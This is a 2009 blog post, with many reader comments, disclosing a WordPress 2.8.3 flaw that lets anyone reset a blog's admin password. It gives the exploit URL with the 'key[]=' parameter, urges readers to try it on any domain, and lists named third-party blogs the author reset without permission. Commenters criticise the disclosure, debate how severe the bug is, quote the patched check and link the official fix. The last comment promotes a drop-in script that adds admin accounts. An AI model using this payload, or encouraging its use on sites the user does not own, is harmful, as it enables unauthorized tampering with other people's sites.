Wordpress Security Flaw: Reset Admin Password of Any Blog Without Confirmation!
This is just way too exciting! Wordpress which is THE CMS of choice for blogge
rs did has such a big security hole! Someone has found a way to reset the admin password without any confirmation and this can have serious consequences.
The hack is still open and can even be applied to the latest Wordpress release 2.8.3
This is how it works:
The normal password reset page asks you to enter the username or email address and if that’s correct then a link is send to the email address associated with that account to reset your password but note that the password itself is not changed and you can just ignore the email and carry on.
But hackers have found a way in which they simply bypass that check and the password is reset by passing a special value in the key parameter of the reset page URL.
This is all you have todo:
http://www.domainname.com/wp-login.php?action=rp&key[]=
Replace domainname with any domain name of a blog hosted on Wordpress and see it for yourself!
Don’t waste time trying this on ProgrammerFish.com”>ProgrammerFish. Cannot be exploited now though
2) TechToggle – I really like this blog though
3) TutPlus – Yeah yeah yeah! 
4) Tutorial9
5) Wordpress Founder’s Personal Blog! ma.tt [Am not sure whether its reset or not but I think it is]
6) Noupe
7) PKPolitics
There are a couple others I tried this on and none of them was protected!
Note: I have just tried this as a proof-of-concept and nothing more then that. You will get an email with your new password and can always reset it yourself again. And sorry guys, OpenSource is not the best thing on earth!
Update:
Read the detailed fix of this wordpress admin password reset exploit
Update 2:
Wordpress update 2.8.4 has been released.
says
Don’t you think you should give people a chance to fix it before blurting it out to the world? Nice job! And yes, that was sarcasm.
says
[...] there is still no patch in sight of the latest Wordpress Admin Password Reset exploit where anyone can reset admin password of any blog hosted on Wordpress without any [...]
says
[...] sure if this has been posted: Major WordPress security flaw. Wordpress Security Flaw: Reset Admin Password of Any Blog Without Confirmation! | ProgrammerFish – E… I have confirmed this is true and have updated my WordPress installs. I urge everyone to do this [...]
says
You are such an asshole.
the least you could have done was offer a fix. You are part of the problem..not the solution
says
I was trying to get this to work against my own website and not having any luck. A change made in revision 10721 is what made this exploit possible, websites running older code are unaffected. This bug has been fixed in revision 11797 as of this morning.
says
Right, because the only way to ensure security is by hiding vulnerabilities rather than disclosing them, amirite guys?
says
So when you do this, doesn’t it just email the admin the new password? That’s what it does on my blog. It’s not really dangerous, just annoying. How does a hacker gain anything from this?
says
no, you’re wrong. You’re just a douchey little man. You don’t hide vulnerabilities you report them to the software vendor and allow them time to release a fix for the problem. Publicizing it to the world in this manner doesn’t help anybody.
says
@Nathan,
I wasn’t pissed because the flaw was disclosed. I was pissed because he offered no solution. Disclosing a flaw without offering a fix (when you do in fact have one), is just plain irresponsible.
It appears he has linked to an actual solution.
says
Here is a fix from the official site:
http://core.trac.wordpress.org/changeset/11798
says
[...] Korjauksen WordPressiin voi tehdä käsin, jos osaa ja uskaltaa. Lisätietoa täältä. [...]
says
Why full disclosure doesn’t work:
http://www.upload.mn/view/202etl1wpd73zjlz0a18.jpg
says
Security flaw? So, you can reset the password. And this affords you what access to the site exactly? This can go down as an annoyance at best, not a “security flaw” as you are blindly labelling it.
says
You sir, get my vote douchebag of the year!
Closed source, proprietary software has never had any sort of flaw like this, right?
says
@chris,
Is a random user supposed to be able to reset an admin password? If not, then I would classify it as a security flaw.
says
Thanks for sending it to the vendor first to allow them to fix it. What a dick.
says
[...] dominio por la web en cuestión. En la fuente muestran ejemplos de blogs conocidos a los que afecta la vulnerabilidad, por ejemplo [...]
says
All software has bugs, regardless of if it’s open source or not.
You are a dumb prick for not publishing the fix.
says
You say “OpenSource is not the best thing on earth!” Yet you have a wordpress blog (and seem to like it)
You also steal from[Full-Disclosure]
Best watch yourself.
says
Such happened to me last night, I did this
http://www.flyninja.net/?p=1079
says
I’m sorry, but you are not a programmer. A programmer does NOT use his or her talents to cause misery for the rest of us. In the future, if you find something like this, you tell the developers, provide a patch, and then shut up until a new version is released AND has had several months to propagate.
At any rate, here is the relevant code:
$key = preg_replace(‘/[^a-z0-9]/i’, ”, $key);
if ( empty( $key ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));
$user = $wpdb->get_row($wpdb->prepare(“SELECT * FROM $wpdb->users WHERE user_activation_key = %s”, $key));
if ( empty( $user ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));
I tried this on my own WP install in a separate file and it failed to pass the second checkpoint. It could be something about my WP install, PHP configuration, or whatever, but your exploit doesn’t work here. Of course, I’ve applied the fix, but it doesn’t change the fact that you have wasted thousands upon thousands of man-hours by choosing this route because each and every blog owner has to patch their own blog instead of waiting for the centrally-deployed WP update. I won’t be too surprised if someone gets the brilliant idea to sue the pants off of you. Or just simply bludgeon you with the computer you used to write this blog post with.
Now, what I should point out is that this exploit is FAR more serious than you realize. WP uses extract() and empty() calls all over the place in the WP code base (which made me rather nervous the first time I saw the code – it tells me the programmers are lazy). If something like this is lurking around because of those calls, then who knows what else can be done. You sir, are an idiot for not thinking about repercussions, publicly announcing this without talking to the WP developers first, and wasting my time. This took me approximately 45 minutes to analyze (I don’t apply code until I know exactly what it does) and fix. You owe the organization I work for $25. We accept cash, check, and credit card payments.
No. Seriously. You owe us $25. Everyone here should post exactly how much time you waste fixing this in your WP install and how much you think this person owes you/your business.
says
@NATHAN
You are a douche as well. There are *ways* to disclose this stuff and this is not the way.
says
And you all bash this guy for publishing this? Bash him because he did not offer you a fix?
The author didn’t say he was the one who found the exploit, or even try to claim that he was.
Fix it yourself until the next Wordpress release which fixes it is released. Some of you douchebags seem to act like everyone has to hold your hand.
Oh ya, to add to the whole ’security’ and ‘flaw’ confusion. A security flaw grants unauthorized access to something such as an admin area, this is nothing but a bug.
says
You’re a moron. You find a security hole and your first idea is “Hey, why don’t I go use this on a bunch of websites I don’t own”?
says
You are a douche. You should always give the owner a chance to fix their issues before making them public. WP never claims to be 100% bug free and always pushes updates quickly. No programmer(s) have ever coded some that is perfect out if the gate.
And moreover this is not a security issue. You are the problem here. Telling half truths and not giving the folks at wp a chance to fix it before going public.
says
Even better, he published the list of sites he illegally accessed, and provided screen shots as evidence.
says
I am absolutely astonished that you would even call this a security flaw. If it were a security flaw, it would allow the hacker access. This makes it hard for me to take your blog seriously anymore.
says
[...] http://www.programmerfish.com/wordpress-security-flaw-reset-admin-password-of-any-blog-without-conf... [...]
says
So, where do you draw the line to what is acceptable and what isn’t? Sure, you can go around and force a password reset on sites you don’t own (or administer) and maybe no one really gets hurt. If you found a bug in, say, the Secret Service protecting the president, would you attempt an assassination just to make a point?
Once a script kiddy always a …
says
[...] Posted in blog | Posted on 11-08-2009 | 1 Comment Tags: wordpress This morning, someone tried logging into Blondish.net 4 times. Or well, they reset my password 4 times! This was not big issue as my email account was not compromised. However I found that this was not a singular issue as it was widespread. Also, when I checked my recent visitor stats, they all were directly to my WordPress login page. ProgrammerFish blogged about it in their article Wordpress Security Flaw: Reset Admin Password of Any Blog Without Confirmation! [...]
says
[...] to other CMS and not compromise their security again. We exposed how vulnerable Wordpress was to a remote admin password reset exploit that resets your admin password without any confirmation and this could mean hackers can exploit it [...]
says
[...] Password Reset Bug http://www.programmerfish.com/wordpress-security-flaw-reset-admin-password-of-any-blog-without-confi... [...]
says
@You do not qualify, sorry bud but he owes you nothing. Propritery software, maybe; OSS, no.
Sure, the author may be liable for the costs of fixing the sites he posted his own proof of doing it to, and he’s is certainly a jackass for encouraging others to do this to sites they do not own, but you’re living on mars if you think you’re owed money. It’s more likely you owe your company money, if you billed for the time taken to post your personal rant.
says
[...] a Twitter la semana pasada), luego descubren que también alguien se está aprovechando de una vulnerabilidad en la versión 2.8.3 de Wordpress descubierta [...]
says
the least you could have done was offer a fix. You are part of the problem..not the solution
says
@jessica
Did you read the complete post? Please don’t comment before reading it all. I have provided solution already!
says
@Salman, too little too late, you’re still and idiot
says
Seems that you’ve done a very good job of hyping this flaw into something more than it really is.
IF this exploit had allowed the users to email a password to an address controlled by them, or IF this allowed to inject a new user / password set in to the authentication database without any further interaction, then this could “have serious consequences.” – As it stands, all this can really do is cause mild irritation for the operators of the blog.
That said, thanks for pointing the flaw out.
I’m glad that the WP community have fixed it. It is shame that you didn’t post the fix along with this article in the first place, but, well, I guess that wasn’t the point of this post, was it?
says
You must be the most arrogant guy on earth…
says
Shame the fix wasn’t on here when you published this
I am just glad this wan’t an actual security flaw where people could have taken control of the admin accounts but at the end of the day I found the fix myself afer landing here via other pages so I guess thanks are actually in order for highlighting this minor issue in the first place.
says
OK. So you find a problem with WordPress and go shouting like this? Is that a way to solve such problems?
And on top of that, you tried it on good blogs and then are proud of it.
I guess you must have heard about WordPress.org website! Just go there are report an issue next time without playing with other’s blogs this way.
Your post did more harm than good. Shouting Monkey!
says
And I forgot this:
Then why are you using WordPress? Go get a good software developed for yourself and stop using Open Source if you think so!
says
We all agree now, you’re a douche.
says
[...] Wordpress Security Flaw: Reset Admin Password of Any Blog Without Confirmation! | ProgrammerFish … Wordpress flaw open in all versions, there is a fix however. (tags: wordpress security cracking password cms) [...]
says
There are a dozen websites that I CANNOT fix in a hurry as I am traveling. With your exploit in the open, and knowing that this is not just a problem with the login page, this means my sites are at risk because of the information you have disclosed.
If any of my sites are affected, I’m going to come after you with a vengeance. This is NOT the way to disclose exploits.
says
I read about this before the update. but didn’t patch my blog. This is an annoyance not a security flaw. Granted, it needed to be fixed and I was happy to apply 2.8.4 today.
I won’t resort to name calling. But please, save us having to vote you off of wordpress. Leave open source and go back to Microsoft products. We don’t need people like you in the open source world, all you did was feed the script kiddies who have nothing better to do than to sit in their parents basement, copy your “exploit” and click on as many blogs as they can find. Giggling each time and telling all their friends Xbox live and WOW about how they are a “Haxor” and how many sites they “pwnd” when they should have been doing their homework.
Thanks Idiot. (crap, I said I wouldn’t resort to name calling) oh well, it’s already typed.
P.S. Put down WOW and do your homework.
says
All of you commenters that think that people owe you something live in an alternate world. If this is your business you should have a security company test your website. He could have leaked this minor bug to the blackhat community and let some real crackers take apart some sites, but no he posted it publicly so that it would get fixed. Go and cry some more that you are using some free software and someone showed you that you get no guarantees with that. Grow up, and be glad that your site is fixed. The proper response for the comments should be “Thank You.”
You really shouldn’t have used that on other peoples sites though, that is kinda rude.
says
Hi Sanity.
Good point: Salman owes us nothing. On the other hand, if you’re going to write about a security problem:
1] DON’T misrepresent the seriousness of the problem in order to try and make it sound more important that it actually is.
2] DON’T test it on other people’s live production websites.
3] DO provide a fix immediately if you have one available.
If you break any of the above guidelines, then you can reasonably expect scorn and derision from a lot of webmasters.
Sorry Salman: I’m sure you’re a lovely chap. Hope you’ve learned a lesson from this one.
says
@Sanity
Thanks for the comment. Seems like you’re one of the few sane people who first thought of it before commenting.
BTW Does anyone know what TechCrunch did with Twitter’s secret documents they were able to get their hands on? They blew it out of proportion to the extent of actually blackmailing them. We did nothing of that sort and all I did was test and show it that it’s still open.
And yes, the fix was posted exactly 4 mins after I published the post but yes 4 minutes seems like a century to most of us here!
Anyways, thanks for those who took it the right way instead of taking me as a ’script guy’. Please go read some of my posts first before you comment again. Thanks.
says
[...] nutnost potvrzení při obnovování uživatelského hesla. Takže útočník mohl velmi snadno vymazat přístupové heslo pro první uživatelský účet v databázi (obvykle admin) na libovolném webu. Nové heslo bylo [...]
says
[...] Moins de 24 heures plus tard sortait la version 2.8.4 de WordPress, ainsi que toutes les explications. [...]
says
[...] ways in which to respectfully report security vulnerabilities. An article on the vulnerability published by Programmerfish.com in my opinion did more harm than good. The article discusses the vulnerability, explains how to put [...]
says
First, I have found bugs and security issues on free products. And my first action was to report it to the software’s developer community.
Even, I have open-source products of my own, and I would love someone reporting security issues than to report to the rest of the world.
We developers are, at the end, human beings and cannot be software Goddess with premonitve powers!
No wonder your name is Salman Ul Haq.
And BTW, did you even buy this Thesis theme at all? Or is it pirated? I have some Thesis security flaws known and you would not want me to implement them on you.
@Sanity: (i believe it is self-posted by author)
Please do not degrade the position of free / open-source softwares. And BTW, even paid softwares can be open-source.
says
Hey good stuff…keep up the good work!
says
[...] are not new and even though most of them could do little or no harm but just irritation like the admin password reset exploit which we reported and had to face a lot of heat from the community over the way the exploit was [...]
says
[...] ways in which to respectfully report security vulnerabilities. An article on the vulnerability published by Programmerfish.com in my opinion did more harm than good. The article discusses the vulnerability, explains how to put [...]
says
[...] Wordpress Security Flaw: Reset Admin Password of Any Blog Without Confirmation! – Programmer Fish [...]
says
[...] admin. Wow. Godt jobba. Han gjør dette flere ganger, muligens i troen om at han kan utnytte en kjent WordPress-svakhet. Som ble fikset for en stund [...]
says
All Hale Microsoft!!!
says
As freelancer most of the time I need to add new admin and quickly login and test new plugin or theme.
I use addnewadmin script. http://hecode.com/addnewadmin
Simply copy the addnewadmin.php in root of your WordPress path and navigate to it and add as many new admin you need. you can login with second admin and change/add original admin info if needed.